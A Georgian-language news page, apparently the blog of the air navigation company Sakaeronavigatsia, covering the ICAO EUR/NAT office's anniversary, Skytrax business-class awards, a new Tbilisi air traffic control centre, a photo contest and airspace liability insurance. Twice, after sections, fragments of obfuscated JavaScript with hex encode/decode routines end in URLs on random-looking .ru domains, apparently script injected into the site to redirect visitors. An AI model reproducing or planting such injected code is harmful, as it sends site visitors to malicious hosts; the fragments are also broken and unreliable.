ICAO-ს ევროპისა და ჩრდილოეთ ატლანტიკის რეგიონალური ოფისი 70 წლისაა

სამოქალაქო ავიაციის საერთაშორისო ორგანიზაციის (ICAO) ევროპისა და ჩრდილოეთ ატლანტიკის რეგიონალური ოფისი (EUR/NAT  Office) 70 წლის იუბილეს აღნიშნავს.  EUR/NAT ოფისი უზრუნველყოფს ICAO-ს საერთაშორისო საავიაციო სტანდარტებისა და რეკომენდირებული პრაქტიკის მიწოდებასა და იმპლიმენტაციის მონიტორინგს ორგანიზაციის 56 წევრ ქვეყანაში . (ICAO მსოფლიო მასშტაბით 191 წევრ ქვეყანას აერთიანებს). რეგიონალური ოფისის მიზანია ფრენის უსაფრთხოების ამაღლება, საავიაციო აქტივობების ეფექტურობის გაზრდა და ეკოლოგიასთან დაკავშირებული საკითხების გადაჭრა.

ICAO-ს ევროპისა და ჩრდილოეთ ატლანტიკის რეგიონალური ოფისი 1946 წელს პარიზში დაარსდა. ჩიკაგოს კონვენციის ყველა ხელმომწერ ქვეყანაში რატიფიცირებამდე, (1947 წ) დროებითმა სამოქალაქო ავიაციის საერთაშორისო  ორგანიზაციამ (PICAO) საფრანგეთის დედაქალაქში რეგიონალური ორგანო შექმნა, რომელსაც  შემდგომში ICAO-ს ევროპისა და ჩრდილოეთ ატლანტიკის რეგიონალური ოფისი ეწოდა.

EUR/NAT  ოფისი აკრედიტირებულია საქართველოშიც და მჭიდროდ თანამშრომლობს სამოქალაქო ავიაციის სტრუქტურებთან, მათ შორის შპს „საქაერონავიგაციასთან.“  2013 წელს კომპანიის მოწვევით, ICAO-ს ევროპისა და ჩრდილოეთ ატლანტიკის ოფისის რეგიონალური დირექტორი ლუის ფონსეკა დე ალმეიდა ქუთაისის სამეთვალყურეო კოშკის გახსნის საზეიმო ცერემონიას დაესწრო და სიტყვით გამოვიდა.  2016 წლის ოქტომბერში თბილისი ICAO-ს EUR/NAT  რეგიონალურ შეხვედრას (RDGE/25) უმასპინძლებს.

მსოფლიოს საუკეთესო ბიზნეს კლასის ავიაკომპანიები

ყოველწლიურად კომოპანია “Skytrax”  მსოფლიოს საუკეთესო ავიაკომპანიებსა და აეროპორტებს მგზავრების შეფასების საფუძველზე გამოავლენს. სხვადასხვა ნომინაციაში გამარჯვებულებს საპატიო ჯილდო გადაეცემათ.  ვლინდება საუკეთესო, 5 ვარსკვლავიანი ავიაკომპანიები, დგინდება რეიტინგები.  შეფასება ხდება როგორც ზოგადად, ასევე კონკრეტული მიმართულებით, – ავიაკომპანიები ჯილდოვდებიან საუკეთესო ბიზნეს კლასისა და ეკონომ კლასის მომსახურების,  კვების,  ბიზნეს კლასის ლაუნჯის მომსახურების და სხვა მახასიათებლების მიხედვით.

ყატარის ავიახაზები

ყატარის ავიახაზების ლაუნჯი

სინგაპურის ავიახაზები

2016 წელს მსოფლიოში საუკეთესო ბიზნეს კლასის ავიაკომპანიად „ყატარის ავიახაზები“ (Qatar Airways) დასახელდა. მას მოსდევს ავიაკომპანია „Singapore Airlines“ და არაბეთის გაერთიანებული საემიროების ნაციონალური ავიახაზები „Etihad Airways“.  „ყატარის ავიახაზები“ პირველია ბიზნეს კლასის საუკეთესო ლაუნჯების კატეგორიაშიც.

თურქიშ ეარლაინსი

თურქეთის ავიახაზების ბიზნეს კლასის ლაუნჯი

თურქეთის ავიახაზები

ბიზნეს კლასის ყველაზე კომფორტული დასაჯდომი ადგილების კატეგორიაში „Qatar Airways“ -მა პირველობა სინგაპურის ავიახაზებს დაუთმო. ხოლო, ბორტსა და ლაუნჯში კვების ხარისხის მიხედვით, მგზავრებმა უპირატესობა თურქეთის ავიახაზებს (Turkish Airlines) მიანიჭეს. ამ კატეგორიებში ყატარის ავიახაზები მეორე ადგილს იკავებს.

თბილისის საჰაერო მოძრაობის მართვის ახალი ცენტრის მშენებლობა გრძელდება

თბილისის საჰაერო მოძრაობის მართვის ახალი ცენტრის მშენებლობა გრძელდება. სამშენებლო სამუშაოები გეგმის მიხედვით, 2016 წლის ბოლოს დასრულდება.

2017 წელს ახალ შენობაში დამონტაჟდება ესპანური კომპანია „INDRA“ მიერ წარმოებული საჰაერო მოძრაობის ავტომატიზირებული მართვის სისტემა. ახალი ტექნოლოგიების დანერგვა არსებული ინფრასტრუქტურის სრულ შეცვლას ითვალისწინებს, რაც ხელს შეუწყობს კომპანიის ძირითადი საქმიანობის – ფრენების უსაფრთხოების უზრუნველყოფას და კიდევ უფრო მაღალ სტანდარტებზე გადასვლას. 

IMG_9689 IMG_9695 IMG_9697 IMG_9700

 

საჰაერო მოძრაობის მართვის ცენტრი სამოქალაქო ავიაციის საერთაშორისო ორგანიზაციის რეკომენდაციებისა და მოთხოვნების შესაბამისად შენდება. ახალი მართვის ცენტრი საქართველოს საჰაერო სივრცის გამტარუნარიანობასაც გაზრდის და კომპანიას შესაძლებლობა ექნება, მაღალი დონის სანავიგაციო მომსახურება უფრო მეტ უცხოურ ავიაკომპანიას გაუწიოს.

პროექტის საერთო ღირებულება 23 მილიონ ლარს აჭარბებს.

თანამედროვე ქალი ტექნოლოგიებში

Tbilisi Photo Festival – ის მიერ საქართველოში აშშ-ის საელჩოს მხარდაჭერით ჩატარებული ფოტო კონკურსის “თანამედროვე ქალი ტექნოლოგიებში“ გამარჯვებული ფოტო სერია.

აქსანა ლომიძე

 

“საქაერონავიგაცია“, საქართველოში 1999 წელს დაარსდა. კომპანია სწრაფად განვითარდა და საშუალება მიეცა განეხორციელებინა მაშტაბური ტექნიკური გადაიარაღება, თანამედროვე სისტემებზე გადასვლა და კადრების გადამზადება, შედეგად, საქართველოს საჰაერო სივრცე ევრაზიის საჰაერო დერეფნის ერთ-ერთი უმნიშვნელოვანესი ნაწილი გახდა და საჰაერო ხომალდების ნაკადმაც საგრძნობლად მოიმატა.

oksana lomidze

ეს ქალბატონები უკვე დიდიხანია „საქაერონავიგაცია“-ში საქმიანობენ, ისინი საჰაერო მოძრაობის მართვის მეთვალყურეები არიან.

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "airnav.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

საქაერონავიგაციის უპრეცენდენტო პროექტი

დღეიდან საქართველოს ცა დაზღვეული იქნება.  პროექტი, რომელიც ეკონომიკისა და მდგრადი განვითარების სამინისტროს შპს “საქაერონავიგაციამ” განახორციელა, უპრეცენდენტოა და მას საქართველოს საავიაციო ისტორიაში ანალოგი არ მოეძებნება. საქართველოს საჰაერო სივრცის დაზღვევა იქნება მნიშვნელოვანი წინსვლა ქართული ავიაციის საერთაშორისო სტანდარტებთან კიდევ უფრო მიახლოების პროცესში.

საჰაერო სივრცის დაზღვევის აუცილებლობა საქართველოს წინაშე რამდენიმე წლის წინდადგა, თუმცა მაშინ ამ პროექტის განხორციელება ვერ მოხერხდა. საქაერონავიგაციამ საჰაერო სივრცის დაზღვევის ვალდებულება  2014 წელს, ევროკონტროლში გაწევრიანების შემდეგ აიღო, ამ რეკომენდაციას მას საერთაშორისო საავიაციო ორგანიზაციებიც აძლევდნენ.

შპს „საქაერონავიგაციის” საქმიანობის არეალია საქართველოს საჰაერო სივრცე, ასევე, საქართველოს ტერიტორიაზე არსებული სამოქალაქო აეროპორტების (ქ. თბილისი, ქ. ქუთაისი, ქ. ბათუმი და დაბა მესტია)აფრენა-დაფრენის ზონები და ოკუპირებული აფხაზეთის საჰაერო სივრცის მაღალი სიმაღლე (FL-280 და ზევით).

“აღნიშნულ პროექტზემუშაობა 2 წლის წინ დავიწყეთ. პროცესი რთული იყო, გამოცდილება ამ კუთხით არ ჰქონდა არც საქაერონავიგაციას და არც სადაზღვევო კომპანიებს. საერთაშორისო საავიაციო ორგანიზაციების მხრიდან მოთხოვნები და პირობები კი მკაცრად იყო გაწერილი. ჩვენ დავეყრდენით ევროპულ გამოცდილებას, გავიარეთ კონსულტაციები სხვადასხვა ქვეყნის საჰაერო სერვისის პროვაიდერებთან და მოხარული ვარ, რომ ასეთი სახელმწიფოებრივი მნიშვნელობის პროექტი წარმატებით განვახორციელეთ. საქართველოს საჰაერო სივრცის დაზღვევით ორგანიზაცია კიდევ ერთხელ უსვამს ხაზს, რომ დარწმუნებულია თავისი თანამშრომლების მაღალ კვალიფიკაციაში და გააჩნია მაღალტექნოლოგიური, საერთაშორისო სტანდარტებთან შესაბამისი ინფრასტრუქტურა. პარალელურად ჩვენ პრიორიტეტად რჩება უახლესი ტექნოლოგიების დანერგვა და თანამშრომელთა კვალიფიკაციის მუდმივი ამაღლება’,- განაცხადა შპს “საქაერონავიგაციის” გენერალურმა დირექტორმა გოჩა მეზვრიშვილმა.

საჰაერო სივრცის დაზღვევა ითვალისწინებს შპს „საქაერონავიგაციის“, როგორც სააერნაოსნო მომსახურების მიმწოდებლის, საქმიანობის შედეგად შესაძლო სამოქალაქო სამართლებრივი პასუხისმგებლობის დაზღვევას მესამე პირთა წინაშე.  ანუ თუ საქართველოს საჰაერო სივრცეში, კომპანიის ბრალეულობით, მოხდება რაიმე საავიაციო ინციდენტი, დაზარალებულის უფლებები ყოველმხრივ დაცული, ხოლო ზარალი ანაზღაურებული იქნება. პასუხისმგებლობის ლიმიტი 500,000,000 აშშ დოლარია.

ღია ტენდერში სადაზღვევო კომპანია “უნისონმა” გაიმარჯვა, რომელიც საქართველოს სადაზღვევო ბაზრის ლიდერთა სამეულშია, გააჩნია მნიშვნელოვანი გამოცდილება და წარმომადგენლობითი პორტფელი. ამ ეტაპზე ყველა დეტალი საქაერონავიგაციას და უნისონს შორის შეთანხმებულია, რაც პროექტის წარმატებისთვის მყარი წინაპირობაა.

“სადაზღვევო კომპანია “უნისონმა” აიღო ვალდებულება და სამოქალაქო პასუხისმგებლობა 500 მილიონი აშშ დოლარის ფარგლებში 100%-ით გადააზღვია. გადამზღვევი კომპანიები, “საქაერონავიგაციის” მოთხოვნის შესაბამისად, დარეგისტრირებული არიან OECD (ეკონომიკური განვითარებისა და თანამშრომლობის ორგანიზაცია) წევრ ქვეყანაში და მათი საერთაშორისო სარეიტინგო შეფასებაა არანაკლებ Standard & Poor’s: A-. გადამზღვევი კომპანიებმა აიღეს პასუხისმგებლობა, მზღვეველის გაკოტრების ან ლიკვიდაციის შემთხვევაში, ხელშეკრულებით გათვალისწინებული ვალდებულებების შესრულებაზე. იმედი მაქვს, ჩვენი და საქაერონავიგაციის თანამშრომლობა წარმატებული იქნება, – აღნიშნა სადაზღვევო კომპანია “უნისონის” დირექტორმა ვასილ ახრახაძემ.

“საქაერონავიგაციის” სამოქალაქო პასუხისმგებლობის დაზღვევის პროექტი არის სახელმწიფოებრივი მნიშვნელობის აქტი, რადგან ის საქართველოს მთავრობას ათავისუფლებს შესაძლო საავიაციო ინციდენტის შედეგად წარმოშობილი ფინანსური პასუხისმგებლობისგან 500 მილიონი დოლარის ფარგლებში.

დაზღვეული ქართული ცა კიდევ უფრო მიმზიდველი გახდება ბევრი ქვეყნის სააერნაოსნო სერვისის პროვაიდერებისთვის და შესაბამისად, უცხოური ავიაკომპანიებისთვის. ეს პროექტი არის მნიშვნელოვანი ნაბიჯი ქართული ავიაციის აღმშენებლობის, მისი მდგრადობის, საიმედოობისა და დამოუკიდებლობის განმტკიცების კუთხით.

 

 

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "airnav.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482